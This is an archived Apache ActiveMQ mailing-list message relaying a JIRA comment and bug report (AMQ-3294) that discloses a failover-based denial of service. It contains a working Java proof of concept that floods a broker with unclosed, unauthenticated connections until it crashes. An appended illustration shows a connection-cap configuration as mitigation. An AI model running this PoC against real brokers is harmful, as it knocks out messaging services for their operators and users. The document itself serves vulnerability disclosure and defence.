activemq-dev mailing list archives

From "Luca Carettoni (JIRA)" <j...@apache.org>
Subject [jira] [Commented] (AMQ-3294) ActiveMQ failover Denial of Service
Date Wed, 31 Aug 2011 17:48:10 GMT

    [ https://issues.apache.org/jira/browse/AMQ-3294?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13094720#comment-13094720 ]

Luca Carettoni commented on AMQ-3294:
-------------------------------------

Gary, thanks for your follow-up!
Haven't tested it yet, but it indeed looks like a possible workaround, at least to avoid a brutal crash.

I've just downloaded the latest stable release (5.5.0) and it does not include this configuration option in any of the configuration templates. From a security standpoint, it would be great to see this transport option enabled by default with a reasonable value.

> ActiveMQ failover Denial of Service
> -----------------------------------
>
>                 Key: AMQ-3294
>                 URL: https://issues.apache.org/jira/browse/AMQ-3294
>             Project: ActiveMQ
>          Issue Type: Bug
>          Components: Broker
>    Affects Versions: 5.2.0, 5.5.0
>         Environment: Linux ubuntu 2.6.32-30-generic and other Linux versions
>            Reporter: Luca Carettoni
>              Labels: security
>
> Abusing the 'failover' feature in ActiveMQ, an unauthenticated user can trigger a Denial of Service condition against the broker service.
> In detail, an attacker can issue multiple ActiveMQ OpenWire connection requests using the following connection string:
> failover:tcp://<IP>:61616
> Due to the 'failover' mechanism, all TCP connections remain active even if a valid session is not created.
> Please note that no valid credentials have been used.
> After a few thousand requests, a "java.net.SocketException: Too many open files" exception is triggered, causing the freeze/crash of the broker. Connected systems may crash as well.
>
> During my test, the attack took around 4 minutes (in a local network) and it is highly reliable. This is most likely an abuse of the 'failover' functionality.
> I've been testing version 5.2.0 and also the latest 5.5.0 release. As both releases are affected, I assume that this issue is present in other versions as well. The problem appears in the default configuration as well as with different authentication plugins enabled.
> Proof-Of-Concept:
> --------------------
> package openwireclient;
>
> import javax.jms.*;
> import org.apache.activemq.ActiveMQConnectionFactory;
>
> // Opens OpenWire connections in a loop through the failover transport using
> // bogus credentials. As described above, each TCP connection stays open on
> // the broker side even though no valid session is ever created, so the
> // broker eventually runs out of file descriptors.
> public class GoAndCrash {
>     private static String url = "failover:tcp://";
>
>     public static void main(String[] args) throws JMSException {
>         System.out.println("\n--[ ActiveMQ Denial of Service PoC ]\n");
>         // args[0] = broker host, args[1] = OpenWire port (e.g. 61616)
>         url = url.concat(args[0] + ":" + args[1]);
>         int cont = 0;
>         while (true) {
>             try {
>                 System.out.println("[*] Request #" + cont);
>                 ConnectionFactory connectionFactory =
>                     new ActiveMQConnectionFactory("invalidUser", "invalidPass", url);
>                 Connection connection = connectionFactory.createConnection();
>                 cont++;
>                 // The connection is deliberately never closed.
>                 connection.start();
>             } catch (Exception ex) {
>                 // Ignore any error and keep opening connections.
>             }
>         }
>     }
> }
> --------------------

--
This message is automatically generated by JIRA.
For more information on JIRA, see: http://www.atlassian.com/software/jira
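Added illustration, not part of the JIRA thread or of the ActiveMQ project's own configuration templates: the shape a per-connector connection cap takes in conf/activemq.xml, shown next to the unbounded form. The thread does not name the transport option Gary suggested; the `maximumConnections` URI parameter used below is the TCP transport connector's accept limit in ActiveMQ 5.x and is my assumption of what a reasonable default would look like, not a statement of what the referenced follow-up recommended. The value 1000 is illustrative.

```xml
<!-- Unbounded (the shape of the 5.5.0 template): nothing stops a flood of
     failover clients from holding thousands of idle, unauthenticated TCP
     connections until the broker hits "Too many open files". -->
<transportConnectors>
    <transportConnector name="openwire" uri="tcp://0.0.0.0:61616"/>
</transportConnectors>

<!-- With a cap: the connector stops accepting once maximumConnections is
     reached (assumed option name, a TCP transport URI parameter in
     ActiveMQ 5.x; 1000 is an illustrative value). Size it to the expected
     client count plus headroom, and keep the broker's file-descriptor
     ulimit above the sum of the caps across all connectors, or the limit
     only moves the failure rather than preventing it. -->
<transportConnectors>
    <transportConnector name="openwire"
        uri="tcp://0.0.0.0:61616?maximumConnections=1000"/>
</transportConnectors>
```

A cap of this kind turns the attack from a broker crash into a refusal of new connections once the limit is hit, so legitimate clients can still be locked out; it limits the blast radius, it does not remove the need to close rejected connections promptly on the broker side.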
